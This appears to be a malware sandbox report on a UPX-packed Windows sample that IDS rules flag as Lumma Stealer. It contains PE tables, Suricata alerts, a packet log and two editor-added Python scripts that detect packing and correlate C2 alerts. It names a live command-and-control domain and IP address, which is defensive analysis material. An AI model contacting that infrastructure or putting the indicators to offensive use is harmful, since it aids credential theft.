IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x64178 | 0xc | UPX2
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x39000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x3a000 | 0x2a000 | 0x29200 | 29e8f87aa566ed9597407d60765631ba | False | 0.9898781819908815 | data | 7.934789695763534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2 | 0x64000 | 0x1000 | 0x200 | 42f2db479e3a90651f2c52d12626a5b2 | False | 0.451171875 | data | 3.251965079275098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
GDI32.dll | BitBlt
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll | CoInitialize
OLEAUT32.dll | VariantInit
SHELL32.dll | SHGetFileInfoW
USER32.dll | GetDC
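The section, data-directory and import tables above are the textbook shape of a UPX-packed PE32: a UPX0 section that is executable but has zero raw size (the unpack target), a UPX1 section with entropy close to 8 that holds the compressed payload and the entry point, a small UPX2 section carrying the import and relocation directories, and an import table of only seven names (LoadLibraryA, GetProcAddress and VirtualProtect are what the stub needs to rebuild the real IAT). The following Python is an added example by the editor, not code from Joe Sandbox or from the sample: it parses section headers by hand and applies exactly those heuristics. The PE image is constructed in memory with the report's layout (0x200 of headers, UPX1 raw 0x29200, UPX2 raw 0x200, 169'472 bytes in total); pseudo-random bytes stand in for the compressed payload, and the import count is passed in from the report's table because the demo does not walk the import directory. Function names and the demo builder are the editor's own.

```python
import math
import random
import struct

IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the buffer (0.0 for empty, ~8.0 for compressed data)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32 image buffer."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, fh + 2)[0]
    size_opt = struct.unpack_from("<H", pe, fh + 16)[0]
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(num_sections):                       # IMAGE_SECTION_HEADER is 40 bytes
        off = opt + size_opt + i * 40
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        data = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": rawsize,
                         "entropy": shannon_entropy(data), "chars": chars})
    return entry_rva, sections


def upx_indicators(entry_rva: int, sections: list, import_count: int) -> list:
    """Heuristics matching the report's tables; each finding is one string."""
    findings = []
    if any(s["name"].startswith("UPX") for s in sections):
        findings.append("UPX section names present")
    for idx, s in enumerate(sections):
        if s["raw_size"] == 0 and s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
            findings.append(f"{s['name']}: executable but zero raw size (unpack target)")
        if s["raw_size"] and s["entropy"] > 7.0:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f} (compressed or encrypted)")
        if idx > 0 and s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            findings.append(f"entry point 0x{entry_rva:x} in {s['name']} (not the first section)")
    if import_count <= 8:
        findings.append(f"only {import_count} imports (stub resolves the rest at runtime)")
    return findings


def build_demo_pe() -> bytes:
    """Constructed PE32 mirroring the report's section layout; not the real sample."""
    rng = random.Random(1)
    upx1 = rng.randbytes(0x29200)                       # stands in for the compressed payload
    upx2 = b"KERNEL32.DLL\0LoadLibraryA\0GetProcAddress\0VirtualProtect\0ExitProcess\0".ljust(0x200, b"\0")
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0x680CF1FB, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, 0x62E80)            # entry 0x462e80 - ImageBase 0x400000
    struct.pack_into("<I", opt, 28, 0x400000)           # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)     # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x65000, 0x200)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                 # NumberOfRvaAndSizes

    def sec(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)
    headers += sec(b"UPX0", 0x39000, 0x1000, 0, 0, 0xE0000080)
    headers += sec(b"UPX1", 0x2A000, 0x3A000, 0x29200, 0x200, 0xE0000040)
    headers += sec(b"UPX2", 0x1000, 0x64000, 0x200, 0x29400, 0xC0000040)
    return headers.ljust(0x200, b"\0") + upx1 + upx2


def analyse(pe: bytes, import_count: int) -> list:
    entry, sections = parse_sections(pe)
    return upx_indicators(entry, sections, import_count)


if __name__ == "__main__":
    image = build_demo_pe()
    for finding in analyse(image, import_count=7):
        print(" -", finding)
```

On a real file, replace `build_demo_pe()` with the bytes read from disk; the same four heuristics fire on this sample's header values, which is why static AV engines and TrID flag it as UPX before any unpacking.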


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-27T18:36:32.180353+0200 | 2061859 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) | 1 | 192.168.2.4 | 53304 | 1.1.1.1 | 53 | UDP
2025-04-27T18:36:32.751218+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49710 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:32.751218+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49710 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:34.823970+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49711 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:34.823970+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49711 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:36.252016+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49712 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:36.252016+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49712 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:37.688311+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49715 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:37.688311+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49715 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:40.067823+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49717 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:40.067823+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49717 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:41.654673+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49718 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:41.654673+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49718 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:44.706836+0200 | 2061860 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI | 1 | 192.168.2.4 | 49721 | 104.21.77.203 | 443 | TCP
2025-04-27T18:36:44.706836+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49721 | 104.21.77.203 | 443 | TCP
                                                                      • Total Packets: 99
                                                                      • 443 (HTTPS)
                                                                      • 53 (DNS)
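The alert table above tells one story in three rules: a DNS lookup for the Lumma domain, then seven TLS sessions in twelve seconds whose SNI carries that domain, each on a fresh source port to 104.21.77.203, and on every one of those sessions the low-severity JA3 rule fires on the same 5-tuple. The Python below is an added example by the editor (not Joe Sandbox code) that turns such rows into a single C2 finding: it pulls the domain out of the signature text, pairs the DNS alert with the SNI sessions, checks which sessions the JA3 rule also matched, and measures the beacon cadence. The alert rows are transcribed from the table into a constructed list with the same nine columns; the function names, the refanging of "tropiscbs .live" and the output fields are the editor's choices.

```python
import re
from datetime import datetime
from statistics import median

FIELDS = ("ts", "sid", "signature", "severity", "src_ip", "src_port", "dest_ip", "dest_port", "proto")
DNS_SIG = "ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live)"
SNI_SIG = "ET MALWARE Observed Win32/Lumma Stealer Related Domain (tropiscbs .live) in TLS SNI"
JA3_SIG = "ET JA3 Hash - Possible Malware - Fake Firefox Font Update"

# Constructed from the report's Suricata table: one DNS alert, then a SNI
# alert and a JA3 alert per TLS session (time of day, source port).
SNI_SESSIONS = [("18:36:32.751218", 49710), ("18:36:34.823970", 49711),
                ("18:36:36.252016", 49712), ("18:36:37.688311", 49715),
                ("18:36:40.067823", 49717), ("18:36:41.654673", 49718),
                ("18:36:44.706836", 49721)]
ALERTS = [("2025-04-27T18:36:32.180353+0200", 2061859, DNS_SIG, 1,
           "192.168.2.4", 53304, "1.1.1.1", 53, "UDP")]
for _t, _port in SNI_SESSIONS:
    _ts = f"2025-04-27T{_t}+0200"
    ALERTS.append((_ts, 2061860, SNI_SIG, 1, "192.168.2.4", _port, "104.21.77.203", 443, "TCP"))
    ALERTS.append((_ts, 2028371, JA3_SIG, 3, "192.168.2.4", _port, "104.21.77.203", 443, "TCP"))

DOMAIN_RE = re.compile(r"\(([^)]+)\)")          # ET rules put the domain in parentheses


def refang(s: str) -> str:
    """'tropiscbs .live' and 'tropiscbs[.]live' both become 'tropiscbs.live'."""
    return s.replace("[.]", ".").replace(" .", ".").replace(" ", "")


def signature_domain(signature: str):
    m = DOMAIN_RE.search(signature)
    return refang(m.group(1)) if m else None


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def correlate_c2(alerts) -> dict:
    """Per flagged domain: DNS time, TLS sessions, JA3 confirmation, cadence."""
    rows = sorted((dict(zip(FIELDS, a)) for a in alerts), key=lambda r: parse_ts(r["ts"]))
    ja3_tuples = {(r["src_ip"], r["src_port"], r["dest_ip"], r["dest_port"])
                  for r in rows if "JA3" in r["signature"]}
    result = {}
    for r in rows:
        domain = signature_domain(r["signature"])
        if not domain:
            continue
        info = result.setdefault(domain, {"dns_at": None, "sessions": []})
        if "DNS Lookup" in r["signature"]:
            info["dns_at"] = info["dns_at"] or r["ts"]
        elif "TLS SNI" in r["signature"]:
            key = (r["src_ip"], r["src_port"], r["dest_ip"], r["dest_port"])
            info["sessions"].append({"ts": r["ts"], "dest_ip": r["dest_ip"], "ja3_hit": key in ja3_tuples})
    for info in result.values():
        times = [parse_ts(s["ts"]) for s in info["sessions"]]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        info["c2_ips"] = sorted({s["dest_ip"] for s in info["sessions"]})
        info["session_count"] = len(times)
        info["ja3_confirmed"] = sum(1 for s in info["sessions"] if s["ja3_hit"])
        info["median_gap_s"] = round(median(gaps), 3) if gaps else None
        info["dns_to_first_tls_s"] = (round((times[0] - parse_ts(info["dns_at"])).total_seconds(), 3)
                                      if times and info["dns_at"] else None)
    return result


def defanged_iocs(result: dict) -> list:
    """Domain(s) and C2 IP(s) in a form safe to paste into a ticket."""
    out = []
    for domain, info in result.items():
        out.append(domain.replace(".", "[.]"))
        out.extend(info["c2_ips"])
    return out


if __name__ == "__main__":
    summary = correlate_c2(ALERTS)
    for domain, info in summary.items():
        print(domain, {k: v for k, v in info.items() if k != "sessions"})
    print(defanged_iocs(summary))
```

The same logic applies unchanged to Suricata eve.json output once the nine fields are mapped from `alert.signature`, `src_ip`, `src_port` and friends; the point of pairing the SNI alert with the JA3 tuple is that the severity-3 JA3 rule on its own is too noisy to act on, but a JA3 hit on the same connection as a severity-1 C2 SNI match is corroboration, not noise.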
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 27, 2025 18:36:32.412964106 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.413022041 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:32.413130999 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.433971882 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.433996916 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:32.751034975 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:32.751218081 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.755515099 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.755537033 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:32.755850077 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:32.803136110 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.808598042 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.808614016 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:32.808737040 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564313889 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564364910 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564390898 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564416885 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564441919 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564462900 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564469099 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.564469099 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.564537048 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564589977 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.564649105 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.564702988 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.564718962 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.565032959 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.565083981 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.565095901 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.585289001 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.585328102 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.585369110 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.585397959 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.585444927 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.746228933 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746320009 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746350050 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746393919 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.746474028 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746534109 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.746771097 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746848106 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.746901989 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.746917963 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.747688055 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.747728109 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.747739077 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.747751951 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.747807026 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.747817993 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748508930 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748536110 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748567104 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748569965 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.748584032 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748625040 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.748644114 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.748699903 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.751168013 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.751209974 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:33.751238108 CEST | 49710 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:33.751252890 CEST | 443 | 49710 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.514836073 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.514895916 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.514985085 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.515357018 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.515368938 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.823898077 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.823970079 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.825726032 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.825736046 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.825982094 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.827222109 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.827373028 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.827399015 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:34.827461004 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:34.827467918 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:35.752438068 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:35.752579927 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:35.752662897 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:35.752857924 CEST | 49711 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:35.752876997 CEST | 443 | 49711 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:35.942640066 CEST | 49712 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:35.942698956 CEST | 443 | 49712 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:35.942847967 CEST | 49712 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:35.943178892 CEST | 49712 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:35.943197966 CEST | 443 | 49712 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:36.251903057 CEST | 443 | 49712 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:36.252016068 CEST | 49712 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:36.253371954 CEST | 49712 | 443 | 192.168.2.4 | 104.21.77.203
Apr 27, 2025 18:36:36.253386021 CEST | 443 | 49712 | 104.21.77.203 | 192.168.2.4
Apr 27, 2025 18:36:36.253688097 CEST | 443 | 49712 | 104.21.77.203 | 192.168.2.4
                                                                      Apr 27, 2025 18:36:36.255070925 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.255202055 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:36.255244017 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116149902 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116297960 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.116367102 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.116414070 CEST49712443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.116431952 CEST44349712104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.381582975 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.381639957 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.381702900 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.382030010 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.382042885 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.688231945 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.688311100 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.689538956 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.689549923 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.689769030 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.690956116 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691096067 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691117048 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.691191912 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691191912 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:37.691199064 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:37.732268095 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.620965004 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.621078968 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:38.621211052 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:38.621330976 CEST49715443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:38.621349096 CEST44349715104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:39.760216951 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760272026 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:39.760390997 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760720968 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:39.760734081 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.067260981 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.067822933 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.069616079 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.069632053 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.069885015 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.071309090 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.071309090 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.071338892 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.836854935 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.836976051 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:40.837025881 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.837234974 CEST49717443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:40.837256908 CEST44349717104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.347058058 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347095013 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.347171068 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347615957 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.347629070 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.654573917 CEST44349718104.21.77.203192.168.2.4
                                                                      Apr 27, 2025 18:36:41.654673100 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.655939102 CEST49718443192.168.2.4104.21.77.203
                                                                      Apr 27, 2025 18:36:41.655946016 CEST44349718104.21.77.203192.168.2.4
